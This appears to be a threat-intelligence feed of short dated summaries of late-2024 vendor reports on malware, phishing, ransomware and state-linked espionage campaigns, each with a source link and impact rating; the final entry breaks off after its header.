Summary:: Researchers at Securelist have discovered a fraudulent activities in which attackers deploy a banking Trojan disguised as parcel-tracking apps. This attractive plan targets both individuals and businesses by luring victims with seemingly authentic bulk-priced offers, causing them to contact the scammers first, so establishing confidence. The Trojan can steal login credentials from customisable windows and control SMS banking services.

Source: https://securelist.com/mamont-banker-disguised-as-parcel-tracking-app/115006/

Intel Source:: Claroty

Intel Name:: IOCONTROL

Date of Scan:: 2024-12-19

Impact:: LOW

Summary:: Team82 has uncovered a sophisticated IoT/OT malware, IOCONTROL, believed to be developed by Iranian-affiliated hackers, targeting critical infrastructure in Israel and the U.S. The malware has affected a range of devices, including routers, programmable logic controllers (PLCs), and fuel management systems, such as those from Orpak and Gasboy. IOCONTROL’s modular design allows it to target a variety of platforms, making it a versatile cyberweapon. The attacks, attributed to the CyberAv3ngers group, a faction linked to Iran's Islamic Revolutionary Guard Corps Cyber Electronic Command, are part of ongoing cyber warfare tied to geopolitical tensions. The malware uses the MQTT protocol to securely communicate with command-and-control servers, enabling the attackers to disrupt services and potentially steal sensitive data. Team82’s analysis also revealed IOCONTROL’s sophisticated evasion techniques, including encryption and obfuscation to avoid detection.

Source: https://claroty.com/team82/research/inside-a-new-ot-iot-cyber-weapon-iocontrol

Intel Source:: Malwarebytes

Intel Name:: Google_Ads_Spread_SocGholish_Malware

Date of Scan:: 2024-12-19

Impact:: LOW

Summary:: Researchers at Malware byte have found a malicious campaign that used Google Search Ads to target Kaiser Permanente employees. The fake advertisements, disguised as links to the healthcare company's HR portal, attempted to phish employees for login credentials. Victims who clicked on the advertisements were routed to a compromised website, asking them to upgrade their browser. This message was part of the SocGholish malware campaign, which infects machines and may enable human operators to carry out malicious activities if the target appears valuable.

Source: https://www.malwarebytes.com/blog/news/2024/12/malicious-ad-distributes-socgholish-malware-to-kaiser-permanente-employees

Intel Source:: Halcyon

Intel Name:: Cloak_Ransomware

Date of Scan:: 2024-12-18

Impact:: MEDIUM

Summary:: Researchers from Halcyon have discovered a ransomware group called Cloak that first appeared in 2022. The group mainly targets small to medium-sized businesses in Europe but now expanded its operation to Asia including sectors such as healthcare, IT, manufacturing, real estate, construction, and food industries. This group access to victim networks by purchasing access from Initial Access Brokers or using social engineering techniques such as phishing, malvertising, and drive-by downloads disguised as Microsoft Windows installers. Victims are presented with ransom notes as desktop wallpapers and text files named readme_for_unlock.txt. If they refuse to pay, their stolen data is published on Cloak's Data Leak Site.

Source: https://www.halcyon.ai/blog/cloak-ransomware-variant-exhibits-advanced-persistence-evasion-and-vhd-extraction-capabilities

Intel Source:: ISC.SANS

Intel Name:: Python_Delivering_AnyDesk_Client_as_RAT

Date of Scan:: 2024-12-18

Impact:: LOW

Summary:: The Remote access tool has become most popular tools among cybercriminals. They are used for both legitimate and malicious purposes. They allow users to remotely manage devices, access files, or troubleshoot systems. As per attacker’s point they are used for spying, stealing data, and moving laterally within a network. Researchers also identified a Python script called an5[.]py that installs Anydesk on victim’s machine which works on both Windows and Linux computers.

Source: https://isc.sans.edu/diary/Python+Delivering+AnyDesk+Client+as+RAT/31524/

Intel Source:: Resecurity

Intel Name:: Scammers_Mimic_Dubai_Police_to_Defraud_UAE_People

Date of Scan:: 2024-12-18

Impact:: LOW

Summary:: Resecurity researchers have uncovered a campaign in which cybercriminals are targeting people in the UAE by impersonating law enforcement officials such as Dubai Police. They are asked to victims to pay fake online fines for traffic tickets, parking violations, or license renewals. The scammers use phishing, smishing and vishing tactic to deceive victims with threats of driving license revocation or vehicle seizure. These scams include links to payment pages that mimic legitimate government websites, making victims believe the requests are genuine.

Source: https://www.resecurity.com/blog/article/cybercriminals-impersonate-dubai-police-to-defraud-consumers-in-the-uae-smishing-triad-in-action

Intel Source:: SecuronixThreatLabs

Intel Name:: FLUXCONSOLE

Date of Scan:: 2024-12-16

Impact:: MEDIUM

Summary:: The Securonix Threat Research team has been monitoring an interesting tax-related phishing campaign where threat actors leveraged MSC files and advanced obfuscation techniques to execute a stealthy backdoor payload. The FLUX#CONSOLE campaign covers a rather interesting approach that threat actors are taking to deliver malware and to skirt traditional AV detections. One of the more notable aspects of the campaign is how the threat actors leverage MSC (Microsoft Common Console Document) files to deploy a dual-purpose loader and dropper to deliver further malicious payloads. This loader efficiently handles both payload delivery and execution, leading to a stealthy and highly obfuscated backdoor DLL file.

Source: https://docs.google.com/spreadsheets/d/1tJ43FIQCeCMpODTVQZIiE6Ycn0Y0ZeJdEiFo6JWjTjA/edit?gid=1879729669#gid=1879729669

Intel Source:: SOC Radar

Intel Name:: Cryptojacking_Campaign_Target_Docker_and_Kubernetes

Date of Scan:: 2024-12-14

Impact:: LOW

Summary:: A cryptojacking campaign is targeting unsecured Docker and Kubernetes systems by exploiting misconfigurations to gain unauthorized access. The attackers exploit open Docker API endpoints without proper authentication that allow them to deploy malicious programs for mining cryptocurrency especially Monero. They primarily target high-performance cloud system in industries such as finance, healthcare, and technology. These attacks slow down systems, increase costs, and disrupt operations.

Source: https://socradar.io/blog-cryptojacking-campaign-targets-docker-and-kubernetes-surge-in-container-based-attacks/

Intel Source:: Symantec

Intel Name:: China_linked_APT_Targets_Southeast_Asia

Date of Scan:: 2024-12-13

Impact:: MEDIUM

Summary:: Threat actors linked to China-based APT groups have targeted several high-profile organizations in Southeast Asia since October 2023, including government ministries, an air traffic control body, a telecoms company, and a media outlet. These attacks appear to be focused on intelligence gathering. The attackers employ a mix of open-source and living-off-the-land tools, including a proxy tool called Rakshasa and DLL sideloading techniques used by the APT group Earth Baku (APT41). Their tactics involve using remote access tools to execute commands, install keyloggers, password collectors, reverse proxy tools, and custom DLLs to intercept login credentials and maintain access to compromised systems.

Source: https://www.security.com/threat-intelligence/china-southeast-asia-espionage#APT

Intel Source:: Mcafee

Intel Name:: Rise_of_Remcos_RAT_in_Q3_2024

Date of Scan:: 2024-12-12

Impact:: LOW

Summary:: Researchers from McAfee Labs have observed a considerable increase in the Remcos RAT threat in Q3 2024, indicating that it is a major cybersecurity concern. This malware, which is usually distributed through phishing emails and malicious attachments, allows attackers to remotely manipulate affected devices, aiding espionage, data theft, and system manipulation. Remcos RAT's rising sophistication highlights the necessity of knowing its methods and implementing strong cybersecurity measures, such as regular updates, email filtering, and network monitoring, to reduce its impact and preserve critical data.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-stealthy-stalker-remcos-rat/

Intel Source:: ANY.RUN

Intel Name:: Advanced_Snake_Keylogger_Variant

Date of Scan:: 2024-12-12

Impact:: LOW

Summary:: Researchers from AnyRun have discovered a new variation of the Snake Keylogger family, known as "Nova," that displays enhanced evasion strategies and expanded data exfiltration capabilities. Snake Keylogger, a.NET-based virus discovered in 2020, is well-known for credential theft and keylogging via phishing campaigns. Nova, developed in VB.NET, uses obfuscation techniques such as Net Reactor Obfuscator and Process Hollowing to avoid detection.

Source: https://any.run/cybersecurity-blog/nova-keylogger-malware-analysis/

Intel Source:: Silent Push

Intel Name:: AIZ_Network_Targets_Retail_and_Crypto

Date of Scan:: 2024-12-12

Impact:: MEDIUM

Summary:: Researchers at Silent Push have discovered a large-scale phishing and pig-butchering network known as "Aggressive Inventory Zombies" (AIZ), which targeted major retail companies and cryptocurrency audiences. The effort impersonates organizations such as Etsy, Amazon, BestBuy, and Wayfair, using a popular website template and integrated chat services for phishing purposes.

Source: https://www.silentpush.com/blog/aiz-retail-crypto-phishing/?utm_source=rss&utm_medium=rss&utm_campaign=aiz-retail-crypto-phishing

Intel Source:: Hunt.IO

Intel Name:: Cobalt_Strike_Infrastructure_Exposed

Date of Scan:: 2024-12-07

Impact:: LOW

Summary:: Researchers from Hunt.IO have discovered a network of suspicious infrastructure running Cobalt Strike 4.10, the latest version released in July 2024. Despite efforts to prevent unauthorized use, threat actors continue to leverage its post-exploitation capabilities. The servers bear a distinct watermark shared by only five other IP addresses worldwide. Domains related to these servers, initially discovered on November 19, imitate well-known brands, indicating a focused phishing operation.

Source: https://hunt.io/blog/rare-watermark-links-cobalt-strike-team-servers-to-ongoing-suspicious-activity

Intel Source:: Cyble

Intel Name:: Malware_Campaign_Targets_Manufacturing_Industry

Date of Scan:: 2024-12-06

Impact:: LOW

Summary:: Researchers from Cyble have discovered a sophisticated malware campaign targeted at the manufacturing industry. To circumvent typical security systems and remotely execute payloads, the attackers employ a misleading LNK file disguised as a PDF and exploit several Living-off-the-Land Binaries (LOLBins), such as ssh.exe, powershell.exe, and mshta.exe.

Source: https://cyble.com/blog/threat-actor-targets-manufacturing-industry-with-malware/

Intel Source:: Cofense

Intel Name:: Data_Exfiltration_via_Formbook_Moalware

Date of Scan:: 2024-12-06

Impact:: LOW

Summary:: Researchers from Cofense have discovered a phishing campaign in which attackers are using legitimate HR communication about year-end leave approvals. The email with the subject line Mandatory Leave Notice for all employees uses professional language to lure employees into clicking on a malicious link that claims the recipient’s leave request has been approved. When the user clicks on a malicious link, it downloads a .zip file that contains an Excel (.xls) document related to Christmas leave schedules in which Formbook malware is deployed which steals sensitive information from the victim.

Source: https://cofense.com/blog/end-of-year-pto-days-off-and-data-exhilaration-with-formbook

Intel Source:: Cado Security Labs

Intel Name:: Meeten_Malware

Date of Scan:: 2024-12-06

Impact:: LOW

Summary:: Researchers at Cado Security Labs have uncovered a scam where Web3 professionals are being targeted in which crypto-stealing malware called Realst is involved which works on both macOS and Windows. The scam is operated by fake company called Meetio which frequently changes its name and has previously been called Clusee, Cuesee, and Meeten. The scammers lure victims through telegram with fake business opportunities and then convince them to download a fake meeting app Meeten from their website which installs the Realst info-stealer to access cryptocurrency wallets and sensitive information. Their websites also contain malicious JavaScript that can steal crypto directly from web browsers even without downloading malware.

Source: https://www.cadosecurity.com/blog/meeten-malware-threat

Intel Source:: Recorded Future

Intel Name:: BlueAlpha_Abuses_Cloudflare_Tunneling_Service

Date of Scan:: 2024-12-05

Impact:: LOW

Summary:: Researchers at Insikt Group have uncovered an ongoing cyber-espionage campaign operated by Russian threat actor called BlueAlpha. The group has been active since 2014 and frequently targets Ukrainian organizations and individuals. BlueAlpha uses spearphishing emails with malicious attachments to infect victims with their malwares such as GammaDrop, GammaLoad, GammaSteel, and Pterodo. These malwares are capable of capable of stealing data, capturing credentials, and maintaining long-term access to compromised systems. The group is using advance tactics such as HTML smuggling to deliver malware via VBScript and leveraging Cloudflare Tunnels for staging its malwares.

Source: https://go.recordedfuture.com/hubfs/reports/cta-ru-2024-1205.pdf

Intel Source:: Trend Micro

Intel Name:: DarkNimbus_Backdoor_Targets_Multiple_Platforms

Date of Scan:: 2024-12-05

Impact:: LOW

Summary:: Researchers from Trend Micro have discovered that the Earth Minotaur threat organization is using the MOONSHINE exploit kit to exploit vulnerabilities in Android messaging apps, primarily targeting the Tibetan and Uyghur groups. MOONSHINE, which has been updated with new capabilities compared to the 2019 version, has been deployed on over 55 servers and is used to distribute the recently found DarkNimbus backdoor. This backdoor, which also has a Windows variant, shows Earth Minotaur's cross-platform attack strategy, affecting both Android and Windows devices.

Source: https://www.trendmicro.com/en_us/research/24/l/earth-minotaur.html

Intel Source:: Cyberarmor

Intel Name:: Investment_Scam

Date of Scan:: 2024-12-05

Impact:: LOW

Summary:: Cyberarmor researchers have uncovered an investment scam where scammers target individuals through online platforms. They trick victims by offer job opportunities or high-yield investments using tactics like social engineering, deceptive websites, and cryptocurrency transactions. The scam operates through a website called totallysoftware[.]tech which appears legitimate but require a special registration code provided by the scammer through WhatsApp. They also use a private backend dashboard to manage victim accounts and oversee the operation.

Source: https://cyberarmor.tech/investment-scam-the-operations/

Intel Source:: Microsoft and Lumen

Intel Name:: SecretBlizzard_Compromising_Storm0156_Infrastructure

Date of Scan:: 2024-12-04

Impact:: MEDIUM

Summary:: Researchers from Microsoft and Lumen Labs have uncovered a cyber campaign conducted by Russian threat actor called Secret Blizzard also known as Turla. This group infiltrated 33 C2 servers previously used by a Pakistani threat group called Storm-0156 which is known for espionage activities. Storm-0156 is associated with two major groups such as SideCopy and Transparent Tribe. Secret Blizzard has been exploiting Storm-0156’s infrastructure for the past years. In 2023, they have used Storm-0156 pre-existing access to deploy their own malware like TwoDash and Statuezy into networks linked to various entities within the Afghan government They also gained access to Pakistani-based workstations, where they extracted sensitive data. By 2024, Secret Blizzard has expanded its tactics by using malware such as Waiscot and CrimsonRAT which had been used in attacks against India’s government and military. Secret Blizzard uses this malware to gather additional data.

Source: https://blog.centurylink.com/snowblind-the-invisible-hand-of-secret-blizzard/?utm_source=rss&utm_medium=rss&utm_campaign=snowblind-the-invisible-hand-of-secret-blizzard https://www.microsoft.com/en-us/security/blog/2024/12/04/frequent-freeloader-part-i-secret-blizzard-compromising-storm-0156-infrastructure-for-espionage/

Intel Source:: Bitsight

Intel Name:: SocksSystemz_Botnet

Date of Scan:: 2024-12-04

Impact:: LOW

Summary:: Researchers from Bitsight have identified a malware called Socks5Systemz that turns compromised systems into proxy servers for allowing criminals to hide their activities online. This is active since 2013 and it was often used as part of other malware like Andromeda and Trickbot but widely recognized in 2023. Researchers also found that Socks5Systemz had infected 250,000 systems around the world in 2023 where they used these systems through a service called PROXY.AM to hide their illegal activities like account hacking and other crimes. Socks5Systemz provides criminals anonymity that makes it difficult to stop and track.

Source: https://www.bitsight.com/blog/proxyam-powered-socks5systemz-botnet

Intel Source:: Cyfirma

Intel Name:: Parano_Malware_Targeting_Users

Date of Scan:: 2024-12-04

Impact:: LOW

Summary:: Researchers at CYFIRMA discovered the introduction of the "Parano" malware family, created by the cybercriminal actor "Paranodeus." This malware package contains Parano Stealer, Parano Ransomware, and Parano Screen Locker, which are all written in Python and use advanced anti-analysis, persistence, and data exfiltration methods.

Source: https://cyfirma.com/research/exploration-of-parano-multiple-hacking-tools-capabilities/

Intel Source:: Cybereason

Intel Name:: Andromeda_Backdoor

Date of Scan:: 2024-12-04

Impact:: LOW

Summary:: Researcher from Cybereason have identified a group of C2 servers related to Andromeda also known as Gamarue. This malware is active at least 2011 and have been used by multiple cybercriminals. It is distributed through phishing emails, infected external drives and as a secondary payload from other malware. Once active, it can download and execute additional malware, steal sensitive information like passwords and establish a backdoor for remote access. Andromeda is targeting manufacturing and logistics companies in the Asia-Pacific (APAC) region with the aim of conducting industrial espionage.

Source: https://www.cybereason.com/blog/new-cluster-andromeda-gamrue-c2

Intel Source:: QuickHeal

Intel Name:: Diving_Deep_into_Zephyr_Coin

Date of Scan:: 2024-12-04

Impact:: LOW

Summary:: Zephyr Coin (ZEPH), launched in 2018, is a privacy-focused digital currency that uses a proof-of-stake system, allowing users to earn rewards by holding onto their coins. It is known for its strong privacy features and user-friendly design, making it a popular choice for secure online transactions. However, as its popularity grows, cybercriminals are increasingly targeting users through malware that spreads in four ways: Visual Basic Script (VBS), Batch Processing File (BAT), PowerShell Script (PS1), and Portable Executable (PE).

Source: https://blogs.quickheal.com/crypto-mining-malware-zephyr/

Intel Source:: Silent Push

Intel Name:: Payroll_Pirates_Phishing_Campaign

Date of Scan:: 2024-12-04

Impact:: LOW

Summary:: Researchers from Silent Push have discovered an ongoing phishing attack known as "Payroll Pirates," which targets HR payroll systems via redirection scams. The gang employs search ads with brand keywords to promote phishing sites, website builders to quickly create domains, and corporate directory structures to boost credibility.

Source: https://www.silentpush.com/blog/payroll-pirates/?utm_source=rss&utm_medium=rss&utm_campaign=payroll-pirates

Intel Source:: Cado Security Labs

Intel Name:: Docusign_Phishing_Attacks

Date of Scan:: 2024-12-04

Impact:: LOW

Summary:: Cado researchers have discovered a new spearphishing campaign targeting technology executives through fake DocuSign emails. These emails usually state there is a document waiting for the recipient to sign and include a link to open it. But the link takes them to a fake DocuSign login page where their credentials are stolen. In this campaign, attackers use legitimate email accounts like Japanese business email accounts that have already been compromised to send the phishing emails.

Source: https://www.cadosecurity.com/blog/the-growing-threat-of-docusign-phishing-attacks

Intel Source:: ISC.SANS

Intel Name:: Infostealer_From_Plain_to_Obfuscated_Version

Date of Scan:: 2024-12-03

Impact:: LOW

Summary:: Trap-Stealer is an example of a Python-based malware that uses multiple obfuscation techniques to evade detection and analysis. These techniques include using meaningless classes and variables, base64 encoding to disguise payloads, encryption with various keys, and zlib compression to obfuscate its real functionality. The malware is dynamically decrypted and executed, making static analysis difficult. Additionally, an obfuscation tool is included in the repository, allowing attackers to automate the creation of obfuscated script versions. While the obfuscation increases file size and execution overhead, it significantly complicates detection.

Source: https://isc.sans.edu/diary/From+a+Regular+Infostealer+to+its+Obfuscated+Version/31484/

Intel Source:: Trend Micro

Intel Name:: Gafgyt_Malware_Targets_Docker_Remote_API_Servers

Date of Scan:: 2024-12-03

Impact:: MEDIUM

Summary:: Trend Micro researchers have identified a shift in the behavior of the Gafgyt malware, which traditionally targets vulnerable IoT devices. The malware is now exploiting misconfigured Docker Remote API servers to deploy itself. Attackers create a Docker container using a legitimate "alpine" image to spread the malware and infect the servers. Once deployed, the Gafgyt botnet can be used to launch DDoS attacks on the targeted servers. This marks a significant expansion of the malware's attack scope beyond IoT devices.

Source: https://www.trendmicro.com/en_us/research/24/l/gafgyt-malware-targeting-docker-remote-api-servers.html

Intel Source:: Fortinet

Intel Name:: SmokeLoader_Targets_Entities_in_Taiwan

Date of Scan:: 2024-12-03

Impact:: LOW

Summary:: FortiGuard researchers have uncovered a campaign where attackers are using SmokeLoader malware to target sector such as manufacturing, healthcare, IT, and other industries in Taiwan. It is known for its advanced technique and acts as a downloader to deliver additional malware. In this campaign, the attack begins with phishing emails containing malicious attachments disguised as business communications such as a quotation. The emails use local language and phrases and are sent in bulk with same content including unaltered recipient details in file names. SmokeLoader performs attacks directly by downloading plugins from its C2 server.

Source: https://www.fortinet.com/blog/threat-research/sophisticated-attack-targets-taiwan-with-smokeloader

Intel Source:: Palo Alto

Intel Name:: Howling_Scorpius_Ransomware_Threat

Date of Scan:: 2024-12-03

Impact:: LOW

Summary:: Researchers from Palo Alto have discovered that the Howling Scorpius ransomware gang, which has been active since early 2023, operates the Akira ransomware-as-a-service (RaaS) and constantly ranks among the top five ransomware groups. Using a twofold extortion tactic, the group targets small to medium-sized businesses in North America, Europe, and Australia, spanning areas such as education, government, manufacturing, technology, and pharmaceuticals. Their operations include encryptors for Windows, Linux, and ESXi hosts, with continual tool developments that increase the risk for enterprises.

Source: https://unit42.paloaltonetworks.com/threat-assessment-howling-scorpius-akira-ransomware/

Intel Source:: CrowdStrike

Intel Name:: BYOVD_Attacks_Surge

Date of Scan:: 2024-12-03

Impact:: MEDIUM

Summary:: Over the past 18 months, Bring Your Own Vulnerable Driver (BYOVD) attacks have increased significantly, with adversaries attempting to bypass endpoint detection and response (EDR) solutions. In these attacks, attackers exploit known vulnerabilities in kernel drivers to perform privileged operations, such as terminating security products or bypassing anti-tampering protections. In September 2024, a CrowdStrike customer experienced an intrusion where six vulnerable drivers were used to evade the Falcon sensor, but all were detected or blocked. The incident resulted in 48 alerts across targeted endpoints, including malware execution and other malicious activities.

Source: https://www.crowdstrike.com/en-us/blog/falcon-prevents-vulnerable-driver-attacks-real-world-intrusion/

Intel Source:: ISC.SANS

Intel Name:: Extracting_Executables_from_Malicious_Word_Docs

Date of Scan:: 2024-12-03

Impact:: LOW

Summary:: Researchers at SANS have found and analyzed a sample that is a Word document with an embedded executable. To extract an embedded executable from a Word document, they used tools like `file-magic.py` to identify the document as an OOXML file. Then, used `zipdump.py` to inspect the ZIP container and find the OLE object (e.g., `oleObject1.bin`). With `oledump.py`, analyzed the OLE stream, extracted metadata like the file hash, and finally used the `-e` option to extract the executable. This process allows to analysis of the malicious executable, though it requires user interaction to run, typically through social engineering.

Source: https://isc.sans.edu/diary/Extracting+Files+Embedded+Inside+Word+Documents/31486/

Intel Source:: Zscaler

Intel Name:: Unveiling_RevC2_and_Venom_Loader

Date of Scan:: 2024-12-03

Impact:: LOW

Summary:: Zscaler ThreatLabz discovered two major campaigns in which the RevC2 and Venom Loader malwares are being deployed by leveraging Venon Spider’s MaaS Tools. Venom Spider also known as GOLDEN CHICKENS is a threat actor known for offering Malware-as-a-Service (MaaS) tools like VenomLNK, TerraLoader, TerraStealer, and TerraCryptor. RevC2 is a malware that uses WebSockets to communicate with its C2 server that allow to steal sensitive information like cookies and passwords. It can also enable remote code execution (RCE) on compromised systems. On the other hand, Venom Loader is a malware loader that customizes its payload for each victim and also uses the victim’s system name to encode the payload.

Source: https://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader#conclusion

Intel Source:: The DFIR Report

Intel Name:: The_TA4557_Attack_Analysis

Date of Scan:: 2024-12-02

Impact:: MEDIUM

Summary:: In March 2024, a malicious campaign attributed to TA4557 (linked to FIN6 and other groups like Cobalt Group and Evilnum) was detected after a user downloaded a malicious resume zip. The attack began with the execution of a malicious .lnk file, leading to the deployment of a series of tools, including a malicious DLL and WMI-based scripts, to establish a beacon to the attacker's command and control server. After initial discovery activity, the threat actor deployed Cobalt Strike and attempted to exploit a vulnerability (CVE-2023-27532) on a backup server to gain admin access. The attacker moved laterally, creating new administrator accounts, deploying Cloudflared, and scanning the network. Activity ceased temporarily but resumed with the removal of persistence tasks and continued use of Cobalt Strike and Cloudflared tunnels. Eventually, the attacker was evicted from the environment.

Source: https://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/

Intel Source:: Genians

Intel Name:: KimSooki_Email_Phishing_Campaign

Date of Scan:: 2024-12-02

Impact:: LOW

Summary:: Genians researchers have identified phishing attacks targeting Korea that are linked to the Kimsuky group. The attackers impersonate trusted organizations or services such as government agencies, financial institutions or portal companies to deceive recipients. Recently, the phishing emails that appeared to come from the Korean government’s electronic document service called National Secretary and contained links to fraudulent websites hosted on a Korean domain service called MyDomain.Korea. These phishing campaigns do not always contain malware but often use URL that redirect recipients to fake websites where sensitive information can be stolen.

Source: https://www.genians.co.kr/blog/threat_intelligence/kimsuky-cases

Intel Source:: Malwarebytes

Intel Name:: Printer_Support_Scam_Campaign

Date of Scan:: 2024-12-02

Impact:: LOW

Summary:: Researchers at Malwarebytes have discovered a new fraud that targets consumers looking for printer support online. The scam consists of fraudulent search advertising that resemble the official websites of well-known printer brands such as HP and Canon. Victims who click these adverts are led to bogus sites and urged to download false printer drivers, which usually fail to install and display faked error messages. The scammers' ultimate goal is to get consumers to contact them, which might lead to extortion or data theft via remote access.

Source: https://www.malwarebytes.com/blog/scams/2024/11/printer-problems-beware-the-bogus-help

Intel Source:: CERT-AGID

Intel Name:: AgentTesla_Campaign

Date of Scan:: 2024-12-02

Impact:: LOW

Summary:: CERT-AGID researchers have identified a malware campaign that spread through emails. Initially, the malware failed to active due to some technical problems but now attackers have fixed the issue and relaunched the malware with .NET file along with AES encryption. The attackers use a tool called Cyberchef to decrypt the malware. After decryption, the malware is identified as AgentTesla, a common tool used to steal sensitive information. This version is different from its usual versions because it loads directly into memory instead of user’s machine.

Source: https://cert-agid.gov.it/news/campagna-agenttesla-ritorna-in-azione-dopo-un-attacco-fallito-aggiornato-loader-e-nuove-tecniche-di-cifratura/

Intel Source:: Securelist

Intel Name:: Horns_and_Hooves_Campaign_Updates

Date of Scan:: 2024-12-02

Impact:: LOW

Summary:: Securelist researcher have uncovered a campaign called Horns&Hooves which has been active since March 2023. The primary targets of this campaign are private users, retailers, and service companies in Russia. In this campaign, the attackers send phishing emails containing ZIP archives with malicious JavaScript or HTML Application disguised as legitimate docs like Purchase requests or Reconciliation statements. These emails trick user into downloading and installing NetSupportRAT, a tool that gives attackers full remote access to the victim's computer. Additionally, attackers installed a tool called Remote Manipulator System (RMS) which they renamed as BurnsRAT. This tool gives them full remote control over the compromised system including ability to transfer files, run commands, and access the desktop using Remote Desktop Protocol (RDP).

Source: https://securelist.com/horns-n-hooves-campaign-delivering-netsupport-rat/114740/

Intel Source:: SOC Radar

Intel Name:: Exploitation_of_Zyxel_Firewalls

Date of Scan:: 2024-11-29

Impact:: MEDIUM

Summary:: A critical vulnerability has been disclosed in Zyxel Firewalls that identified as CVE-2024-11667 with CVSS score of 7.5. This flaw has identified in web management interface of certain firmware versions which allow attackers to upload or download files through specially crafted URLs. Researchers have linked this vulnerability to Helldown ransomware which exploits it to gain initial access to networks. Exploitation of this vulnerability can compromise of data theft, enabling attackers to establish VPN connections, alter firewall settings, and execute further malicious actions.

Source: https://socradar.io/zyxel-firewalls-exploited-for-ransomware-attacks-20-security-flaws-discovered-in-advantech-access-points/

Intel Source:: 360 Threat Intelligence Center

Intel Name:: Analysis_of_APT_C_48_Phishing_Attack

Date of Scan:: 2024-11-29

Impact:: MEDIUM

Summary:: APT-C-48 (CNC), a threat actor with ties to a South Asian government, has been identified targeting various sectors such as government, military, education, and healthcare. They use spear-phishing emails with "resume"-related subjects to deliver malicious payloads. The malicious executable files are hidden in compressed attachments, with their icons disguised as PDF files and filenames obfuscated by blank characters to evade detection. When opened, these files download additional malicious components from a remote server, enabling further attacks.

Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247504896&idx=1&sn=42097a09cd3420fd7168ba1afc84939e&chksm=f9c1e709ceb66e1fd732a72853e48466ae332109a6200a58c1ddab56e1c7d90b902cbbd64027&scene=178&cur_album_id=1955835290309230595

Intel Source:: Threatdown

Intel Name:: Beluga_Phishing_Campaign

Date of Scan:: 2024-11-28

Impact:: LOW

Summary:: Researchers from Threatdown have uncovered a phishing campaign targeting OneDrive users to steal their login credentials. It starts with an email containing an .htm attachment where the recipient's email address is pre-filled along with their company logo. Victims are tricked into clicking a VIEW DOCUMENT button to access a file which leads to a fake login page where the email address cannot be changed and fake login buttons like Sign In or Create Account are non-functional. The entered credentials like victim’s email and IP address are sent to attackers via Telegram. After gaining access, attackers can steal sensitive files, spread malware, delete backups, and encrypt important data for ransom.

Source: https://www.threatdown.com/blog/beluga-phishing-campaign-targets-onedrive-credentials/

Intel Source:: Bitdefender

Intel Name:: Global_Netflix_Phishing_Campaign

Date of Scan:: 2024-11-28

Impact:: LOW

Summary:: Bitdefender researchers have discovered a large-scale phishing attack aimed at Netflix subscribers in 23 countries, including the United States, Germany, Spain, and Australia, in an attempt to obtain login credentials and credit card details. The campaign uses SMS texts to build urgency, due to problems with subscription payments and driving people to bogus websites.

Source: https://www.bitdefender.com/en-us/blog/hotforsecurity/netflix-scam-stay-safe

Intel Source:: Reversing Labs

Intel Name:: Python_Package_aiocpa_Targets_Crypto

Date of Scan:: 2024-11-28

Impact:: LOW

Summary:: Researchers at ReversingLabs have found a malicious Python module called aiocpa that is meant to exploit cryptocurrency wallets. Unlike traditional attacks on open-source repositories such as PyPI, the threat actors behind aiocpa did not use typosquatting or impersonation, instead releasing a crypto client tool to entice users before sending a malicious update.

Source: https://www.reversinglabs.com/blog/malicious-pypi-crypto-pay-package-aiocpa-implants-infostealer-code

Intel Source:: Trustwave

Intel Name:: Exploring_Rockstar_Kit_FUD_Link_Techniques

Date of Scan:: 2024-11-28

Impact:: LOW

Summary:: Trustwave researchers have done the second part of an investigation into the Rockstar kit, focusing on real-world examples of phishing emails that utilize Rockstar's advanced techniques. The Rockstar platform promotes the creation of fully undetectable (FUD) links for phishing campaigns, which evade detection systems that examine the initial URL. These techniques include using link redirectors (e.g., shortened URLs, open redirects, and URL protection services), as well as abusing trusted services and sites to host phishing content or redirect victims.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rockstar-2fa-phishing-as-a-service-paas-noteworthy-email-campaigns/

Intel Source:: ESET

Intel Name:: Bootkitty_The_First_UEFI_Bootkit_for_Linux

Date of Scan:: 2024-11-27

Impact:: LOW

Summary:: ESET researchers have discovered the first UEFI bootkit which is created to target Linux systems called Bootkitty. It is currently in experimental stage rather than fully developed malware. Bootkitty’s primary goal is to disable Linux kernel security checks and load extra programs during the Linux boot process. It specifically targets certain versions of Ubuntu and modifying the integrity verification functions in memory before the GRUB bootloader is executed. Additionally, researchers identified an unsigned kernel module called BCDropper which loads another kernel module using an ELF program.

Source: https://www.welivesecurity.com/en/eset-research/bootkitty-analyzing-first-uefi-bootkit-linux/

Intel Source:: Trustwave

Intel Name:: Rockstar_2FA_A_Phishing_Platform

Date of Scan:: 2024-11-27

Impact:: LOW

Summary:: Trustwave researchers have identified a phishing tool called Rockstar 2FA which is linked to phishing campaign targeting Microsoft user accounts. This campaign employs advanced techniques called adversary-in-the-middle (AiTM) attacks which allow attackers to bypass MFA and steal login credentials and session cookies. The phishing emails in this campaign use various lures such as fake document notifications, HR messages, and IT alerts. The Rockstar 2FA phishing operates as Platform-as-a-Service (PaaS) which provides easy to use tool and multiple features like MFA bypass, anti-bot protection, and multiple customizable login page templates to attackers for launching phishing attacks.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rockstar-2fa-a-driving-force-in-phishing-as-a-service-paas/

Intel Source:: Any.Run

Intel Name:: PSLoramyra_Loader_Exploits_Scripts

Date of Scan:: 2024-11-27

Impact:: LOW

Summary:: Researchers at Any.Run have found PSLoramyra, a powerful fileless loader that uses PowerShell, VBS, and BAT scripts to inject and execute malicious payloads directly in memory, avoiding typical detection methods. Its infection chain begins with a PowerShell script that creates essential files and establishes persistence via Windows Task Scheduler. The loader's hidden operation and small system footprint make it a major cybersecurity risk.

Source: https://any.run/cybersecurity-blog/psloramyra-malware-technical-analysis/

Intel Source:: Sucuri

Intel Name:: Credit_Card_Malware_Targeting_Magento_Website

Date of Scan:: 2024-11-27

Impact:: LOW

Summary:: Sucuri researchers have observed that cybercriminals are targeting Magento ecommerce website due to the valuable customer data. The malware either creates fake credit card forms or directly steals payment details during checkout based on its variant It then encrypts the stolen data and sends it to a remote server. The attackers use malicious JavaScript injected into Magento sites to conduct these activities.

Source: https://blog.sucuri.net/2024/11/credit-card-skimmer-malware-targeting-magento-checkout-pages.html

Intel Source:: qualys

Intel Name:: Advanced_Hunting_Unveiled

Date of Scan:: 2024-11-27

Impact:: MEDIUM

